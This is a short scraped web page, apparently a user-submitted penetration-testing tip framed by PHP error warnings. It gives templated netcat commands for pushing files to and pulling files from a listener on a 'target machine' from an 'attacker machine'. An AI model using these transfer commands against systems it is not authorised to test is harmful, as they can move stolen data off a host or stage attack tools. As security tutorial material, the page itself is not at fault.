Warning: PHP Request Startup: Invalid date.timezone value '', using 'UTC' instead in Unknown on line 0

Warning: PHP Request Startup: Session ini settings cannot be changed after headers have already been sent in Unknown on line 0

Warning: session_start(): Session cannot be started after headers have already been sent in /home/admud64/mrleet.com/user/database_connection.php on line 5
using nc for file transfer- exploitation tool used and required in Penetration Testing ~ MrLeet

Title: using nc for file transfer- exploitation tool used and required in Penetration TestingAuthor: ajayverma
Push from Client to Listener
On target machine: nc -lp [local port] > [outfile]
On attacker machine: nc -w3 [listener IP] [listener port] < [infile]
Send [infile] to listener, where it will be stored in [outfile]

Pull from Listener to Client
On target machine: nc -lp [local port] < [infile]
On attacker machine: nc -w3 [listener IP] [listener port] > [outfile]
Get [infile] from listener and store in [outfile]



Submitted On: 2019-06-26 09:48:03




Warning: PHP Startup: Invalid date.timezone value '', using 'UTC' instead in Unknown on line 0